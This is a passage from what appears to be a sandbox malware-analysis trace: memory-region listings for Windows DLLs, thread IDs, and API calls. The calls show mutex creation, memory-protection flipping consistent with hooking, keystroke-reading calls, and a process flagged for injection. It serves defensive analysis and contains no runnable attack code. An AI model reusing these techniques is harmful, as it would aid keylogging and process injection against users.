"\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1410 start_va = 0x7ffda17d0000 end_va = 0x7ffda1807fff monitored = 0 entry_point = 0x7ffda17e8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1411 start_va = 0x7ffda1810000 end_va = 0x7ffda181afff monitored = 0 entry_point = 0x7ffda1811d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1412 start_va = 0x7ffda18b0000 end_va = 0x7ffda18c5fff monitored = 0 entry_point = 0x7ffda18b1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1413 start_va = 0x7ffda1d80000 end_va = 0x7ffda1e11fff monitored = 0 entry_point = 0x7ffda1dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1414 start_va = 0x7ffda25e0000 end_va = 0x7ffda2961fff monitored = 0 entry_point = 0x7ffda2631220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1415 start_va = 0x7ffda2970000 end_va = 0x7ffda2aa5fff monitored = 0 entry_point = 0x7ffda299f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1416 start_va = 0x7ffda42f0000 end_va = 0x7ffda43aefff monitored = 0 entry_point = 0x7ffda4311c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1417 start_va = 0x7ffda43b0000 end_va = 0x7ffda43effff monitored = 0 entry_point = 0x7ffda43c6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1418 start_va = 0x7ffda4420000 end_va = 0x7ffda4455fff monitored = 0 entry_point = 0x7ffda4430070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1419 start_va = 0x7ffda4f10000 end_va = 0x7ffda50c0fff monitored = 0 entry_point = 0x7ffda4fa61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1420 start_va = 0x7ffda50d0000 end_va = 0x7ffda5171fff monitored = 0 entry_point = 0x7ffda50f0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1421 start_va = 0x7ffda5180000 end_va = 0x7ffda5427fff monitored = 0 entry_point = 0x7ffda5213250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 1422 start_va = 0x7ffda5430000 end_va = 0x7ffda5451fff monitored = 0 entry_point = 0x7ffda5431a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1423 start_va = 0x7ffda5540000 end_va = 0x7ffda5622fff monitored = 0 entry_point = 0x7ffda5577da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 1424 start_va = 0x7ffda5930000 end_va = 0x7ffda59a8fff monitored = 0 entry_point = 0x7ffda594fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1425 start_va = 0x7ffda5b60000 end_va = 0x7ffda5ff2fff monitored = 0 entry_point = 0x7ffda5b6f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1426 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1427 start_va = 0x7ffda6290000 end_va = 0x7ffda62abfff monitored = 0 entry_point = 0x7ffda62937a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1428 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1429 start_va = 0x7ffda6530000 end_va = 0x7ffda65c5fff monitored = 0 entry_point = 0x7ffda6555570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1430 start_va = 0x7ffda6620000 end_va = 0x7ffda66c9fff monitored = 0 entry_point = 0x7ffda6647910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1431 start_va = 0x7ffda66d0000 end_va = 0x7ffda67cffff monitored = 0 entry_point = 0x7ffda6710f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1432 start_va = 0x7ffda6a30000 end_va = 0x7ffda6a61fff monitored = 0 entry_point = 0x7ffda6a42340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1433 start_va = 0x7ffda6bb0000 end_va = 0x7ffda6bd3fff monitored = 0 entry_point = 0x7ffda6bb3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1434 start_va = 0x7ffda6fc0000 end_va = 0x7ffda6fcbfff monitored = 0 entry_point = 0x7ffda6fc27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1435 start_va = 0x7ffda70a0000 end_va = 0x7ffda70d0fff monitored = 0 entry_point = 0x7ffda70a7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1436 start_va = 0x7ffda7100000 end_va = 0x7ffda7179fff monitored = 0 entry_point = 0x7ffda7121a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1437 start_va = 0x7ffda71c0000 end_va = 0x7ffda71f3fff monitored = 0 entry_point = 0x7ffda71dae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1438 start_va = 0x7ffda7200000 end_va = 0x7ffda7209fff monitored = 0 entry_point = 0x7ffda7201830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1439 start_va = 0x7ffda7310000 end_va = 0x7ffda732efff monitored = 0 entry_point = 0x7ffda7315d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1440 start_va = 0x7ffda7480000 end_va = 0x7ffda74dbfff monitored = 0 entry_point = 0x7ffda7496f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1441 start_va = 0x7ffda7530000 end_va = 0x7ffda7546fff monitored = 0 entry_point = 0x7ffda75379d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1442 start_va = 0x7ffda7650000 end_va = 0x7ffda765afff monitored = 0 entry_point = 0x7ffda76519a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1443 start_va = 0x7ffda76e0000 end_va = 0x7ffda7719fff monitored = 0 entry_point = 0x7ffda76e8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1444 start_va = 0x7ffda7720000 end_va = 0x7ffda7746fff monitored = 0 entry_point = 0x7ffda7730aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1445 start_va = 0x7ffda7830000 end_va = 0x7ffda785cfff monitored = 0 entry_point = 0x7ffda7849d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1446 start_va = 0x7ffda7a40000 end_va = 0x7ffda7a68fff monitored = 0 entry_point = 0x7ffda7a54530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1447 start_va = 0x7ffda7a70000 end_va = 0x7ffda7b08fff monitored = 0 entry_point = 0x7ffda7a9f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1448 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1449 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1450 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1451 start_va = 0x7ffda7c30000 end_va = 0x7ffda7c3ffff monitored = 0 entry_point = 0x7ffda7c356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1452 start_va = 0x7ffda7c40000 end_va = 0x7ffda7cc5fff monitored = 0 entry_point = 0x7ffda7c4d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1453 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1454 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1455 start_va = 0x7ffda7f30000 end_va = 0x7ffda80f6fff monitored = 0 entry_point = 0x7ffda7f8db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1456 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1457 start_va = 0x7ffda8150000 end_va = 0x7ffda81a4fff monitored = 0 entry_point = 0x7ffda8167970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1458 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1459 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1460 start_va = 0x7ffda8970000 end_va = 0x7ffda8986fff monitored = 0 entry_point = 0x7ffda8971390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1461 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1462 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1463 start_va = 0x7ffda8ae0000 end_va = 0x7ffda8b86fff monitored = 0 entry_point = 0x7ffda8aeb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1464 start_va = 0x7ffda8b90000 end_va = 0x7ffda8b97fff monitored = 0 entry_point = 0x7ffda8b91ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1465 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1466 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1467 start_va = 0x7ffda8d90000 end_va = 0x7ffda8e9afff monitored = 0 entry_point = 0x7ffda8db2300 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 1468 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1469 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1470 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1471 start_va = 0x7ffda9800000 end_va = 0x7ffda986afff monitored = 0 entry_point = 0x7ffda98190c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1472 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1473 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1474 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1475 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1476 start_va = 0x7ffdaafa0000 end_va = 0x7ffdaafbbfff monitored = 0 entry_point = 0x7ffdaafa31a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1477 start_va = 0x7ffdaafc0000 end_va = 0x7ffdab02efff monitored = 0 entry_point = 0x7ffdaafe5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1478 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1479 start_va = 0x7ffdab2a0000 end_va = 0x7ffdab3f9fff monitored = 0 entry_point = 0x7ffdab2e38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1480 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1481 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1497 start_va = 0x600000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 70 os_tid = 0x35c Thread: id = 71 os_tid = 0x1248 Thread: id = 72 os_tid = 0x1238 Thread: id = 73 os_tid = 0x1230 Thread: id = 74 os_tid = 0x1228 Thread: id = 75 os_tid = 0x11f8 Thread: id = 76 os_tid = 0x5c0 Thread: id = 77 os_tid = 0x350 Thread: id = 78 os_tid = 0x334 Thread: id = 79 os_tid = 0xd60 Thread: id = 80 os_tid = 0x428 Thread: id = 81 os_tid = 0xfd0 Thread: id = 82 os_tid = 0xfcc Thread: id = 83 os_tid = 0x7b4 [0155.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x14c7f0 | out: HeapArray=0x14c7f0*=0x4e0000) returned 0x6 [0155.513] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x3da0) returned 0x59c3100 [0155.526] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14c5d0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0155.557] RtlIntegerToChar (in: Value=0x5d8, Base=0x0, Length=0x20, String=0x14cbb0 | out: String="1496") returned 0x0 [0155.557] RtlIntegerToChar (in: Value=0xc5d81c1f, Base=0x0, Length=0x20, String=0x14cbb0 | out: String="3319274527") returned 0x0 [0155.557] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="S-1-5-21-1560258-14963319274527") returned 0xa8c [0155.558] GetLastError () returned 0x0 [0155.584] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14c360 | out: Value="RDhJ0CNFevzX") returned 0x0 [0155.595] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14c660 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0155.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebcad0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0155.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebcad0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0155.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ec2df0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ec2000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0155.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ec2df0, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ec2000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0155.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebc540, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0155.844] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebc540, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0155.901] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebc670, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x40, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x20) returned 0x0 [0155.910] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14c818*=0x7ffda8ebc670, NumberOfBytesToProtect=0x14c810, NewAccessProtection=0x20, OldAccessProtection=0x14c960 | out: BaseAddress=0x14c818*=0x7ffda8ebc000, NumberOfBytesToProtect=0x14c810, OldAccessProtection=0x14c960*=0x40) returned 0x0 [0156.073] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffd97b990c0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffd97b99000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0156.083] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffd97b990c0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffd97b99000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0156.452] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffd97b9a5b0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffd97b9a000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0156.461] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffd97b9a5b0, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffd97b9a000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0156.593] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffda7835330, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x40, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffda7835000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x20) returned 0x0 [0156.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x14ca78*=0x7ffda7835330, NumberOfBytesToProtect=0x14ca70, NewAccessProtection=0x20, OldAccessProtection=0x14cbc0 | out: BaseAddress=0x14ca78*=0x7ffda7835000, NumberOfBytesToProtect=0x14ca70, OldAccessProtection=0x14cbc0*=0x40) returned 0x0 [0156.620] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x14c5de, cbSize=0x14c5b0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x14c5b0) returned 0x0 [0156.728] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x14c9b0 | out: lpWSAData=0x14c9b0) returned 0 [0250.672] GetKeyState (nVirtKey=17) returned 0 [0250.672] GetKeyState (nVirtKey=20) returned 0 [0250.672] GetKeyState (nVirtKey=16) returned 0 [0250.673] ToUnicode (in: wVirtKey=0x5b, wScanCode=0x5b, lpKeyState=0x670afa, pwszBuff=0x670bfa, cchBuff=16, wFlags=0x0 | out: pwszBuff="") returned 0 Process: id = "9" image_name = "absolutetelnet.exe" filename = "c:\\program files (x86)\\msbuild\\absolutetelnet.exe" page_root = "0x38608000" os_pid = "0xc90" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\absolutetelnet.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1513 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1514 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1515 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1516 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1517 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1518 start_va = 0xa0000 end_va = 0xb6fff monitored = 0 entry_point = 0xa14a1 region_type = mapped_file name = "absolutetelnet.exe" filename = "\\Program Files (x86)\\MSBuild\\absolutetelnet.exe" (normalized: "c:\\program files (x86)\\msbuild\\absolutetelnet.exe") Region: id = 1519 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1520 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 